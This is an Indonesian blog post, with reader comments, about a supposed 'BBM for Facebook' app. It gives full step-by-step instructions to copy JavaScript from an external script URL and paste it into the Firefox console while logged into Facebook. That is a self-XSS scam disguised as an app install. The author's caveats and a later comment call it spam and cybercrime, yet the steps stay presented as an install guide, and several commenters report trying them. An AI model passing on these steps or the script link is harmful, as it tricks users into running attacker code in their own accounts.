Cara Install BBM for Facebook

IQROZEN | Cara Membuat BBM in Facebook. Awalnya sih cuek melihat berita yang beredar di SOSMED tentang BBM for Facebook. Namun setelah disimak ternyata menarik juga untuk diterapkan, meski ada keraguan. Paling tidak dapat menjadi nilai tambah bagi Facebook jika dibanding Google Plus (G+). Baca juga artikel tentang Persaingan G+ versus Facebook tahun ini.

Demi menjaga eksistensinya, baru-baru ini pihak BBM meluncurkan aplikasi baru yang bernama "BBM For Facebook". Aplikasi ini dirancang agar pengguna BBM dapat langsung menjalankan akun BBMnya dari Facebook tanpa harus meninggalkan laman Facebook. Dengan kata lain, dengan aplikasi ini kita bisa Online Facebook sekaligus ber BBM-an ria. Tentu ini menjadi kabar gembira bagi saudara yang belum punya BBM atau belum memiliki Smartphone yang support pada aplikasi BBM, Google+, WhatsApp dan lainnya. Lihat Bergabungnya Sosial Media Terpopuler.

Berikut adalah trik yang beredar di media FACEBOOK terkait Cara instal BBM for Facebook yang belakangan ini terindikasi SPAM.

1.►Gunakan browser " Mozilla Firefox " (Jangan Menggunakan Browser Lain)
       -Lalu Buka Profil Facebook saudara
2.►COPY Semua CODE Pada Link http://yourjavascript.com/4294435131/bbm-for-facebook.js (agar mudah dan tercopy semuanya tekan Ctrl A dan klik copy)
3 .►Kembali ke Profil Facebook saudara lagi
      - Lalu Tekan CTRL+Shift+K pada keyboard secara bersamaan.
4.►PASTE Code yang sudah di COPY tadi pada kotak paling bawah tepat di depan Tanda >> (Klik gambar untuk hasil yang lebih jelas).
Cara Install BBM di profil Facebook
        -Lalu Tekan ENTER
5.►Tunggu sampai proses Instalasi selesai.

Demikian informasi terkait Instal BBM for Facebook yang beredar di Sosial Media namun banyak yang mengeluhkan dan menganggapnya Kejahatan Internet. Jadi, mohon hati-hati ketika saudara coba mengaplikasikannya. Semoga informasi ini bermanfaat dan menjadi pelajaran buat kita semua. Jangan lupa mampir ke Cara Mudah Membuat Daftar Isi Blog.
Thank you for visiting my post today.
Title : Cara Install BBM for Facebook
Description : IQROZEN | Cara Membuat BBM in Facebook. Awalnya sih cuek melihat berita yang beredar di SOSMED te...
Please, visit more!

Sebarkan artikel ini melalui :

Facebook Google+ Twitter

30 Responses to "Cara Install BBM for Facebook"

  1. keren niih. jadinya semua orang yang punya facebook bisa pakai BBM.. :)

    ReplyDelete
    Replies
    1. iya gan, inilah perkembangan teknologi yg pesat..

      Delete
  2. Replies
    1. Coba saja Search di google, maaf saya belum pernah menghapusnya dan sayang kalo dihapus...

      Delete
  3. prosesnya kok lama?

    ReplyDelete
    Replies
    1. Biasanya cara installnya cepat, tidak sampai lima menit kox..

      Delete
  4. Bagaimana cara menginstalnya di hp samsung tipe ace 3 gts 7270

    ReplyDelete
  5. Bagaimana cara menginstalnya di hp samsung tipe ace 3 gts 7270

    ReplyDelete
    Replies
    1. Langsung saja buka browser Mozilla, kalo gak ada mozila atau firefox wah saya belum pengalaman Cara Install BBM for Facebook di ponsel....

      Delete
  6. Permohonan Maaf saya sampaikan kepada pembaca artikel ini, karena informasi terbaru mengatakan jika Cara Install BBM for Facebook adalah bagian dari kejahatan internet atau Cybercriminal. Silakan baca http://www.merdeka.com/teknologi/jangan-coba-coba-klik-tips-bbm-an-via-facebook.html

    ReplyDelete
    Replies
    1. nice info gan ^_^ www.dharmacomputer.com

      Delete
  7. saya coba dulu semoga lebih cepaat dari yg lainya,hehe

    ReplyDelete
    Replies
    1. pakai chrome hanya tampilan backgroundnya saja yang berubah jadi BBM :D

      Delete
  8. langsung nyoba ya...trimakasih untuk artikelnya

    ReplyDelete
  9. wah baru tau saya sob , bikin bbm ada di profil facebook wah ketinggalan nih aku... coba ah :)

    ReplyDelete
  10. keren niih infonya,makasih gannn :)

    ReplyDelete
  11. keren bangetnih infonya, makasihh gan... :)

    ReplyDelete
  12. semakin canggih sebuah teknologi maka semakin besar peluang kejahatan itu terjadi, buktinya PIN BB aja ada yang bisa membuatnya sama persis, namun bagaimana nantinya BBM di facebook, berhati hatilah tentang informasi penting anda ^_^ salam by www.dharmacomputer.com

    ReplyDelete
  13. kok di laptop saya gk ada kotak yg brtanda >>???

    ReplyDelete
  14. kok di lptop saya gak ada kotak yg brtanda >> yaaa???

    ReplyDelete
  15. kok di laptop saya gk ada kotak di bawah yg bertanda >>

    ReplyDelete
  16. kog lama bgt ea maz

    ReplyDelete
  17. udah tak paste n enter,,,ne jawabanx,,,,
    SyntaxError: unterminated string literal

    ReplyDelete
    Replies
    1. Kayaknya sudah di blokir jadi banyak yang gagal... Maaf y...

      Delete
  18. kog kyak script skin facebook yak....???

    ReplyDelete
    Replies
    1. Iya gan, itu kerjaan spammer, makanya saya kasih note sebelum diterapkan..

      Delete

✔ Silakan berkomentar dengan baik karena langsung dipublikasikan.
✘ Mohon tidak meninggalkan SPAM atau link aktif di kolom komentar.

GooglePlus dan Label

Adsense (13) Album (16) Download (6) Dunia (29) Elektro (15) English (13) Fashion (11) Islam (122) Kesehatan (35) Kisah (23) Knowledge (60) New (12) Olahraga (59) OPINI (73) Otomotif (6) Review (6) Selebrita (23) SEO (19) Tutorial (79) Video (14)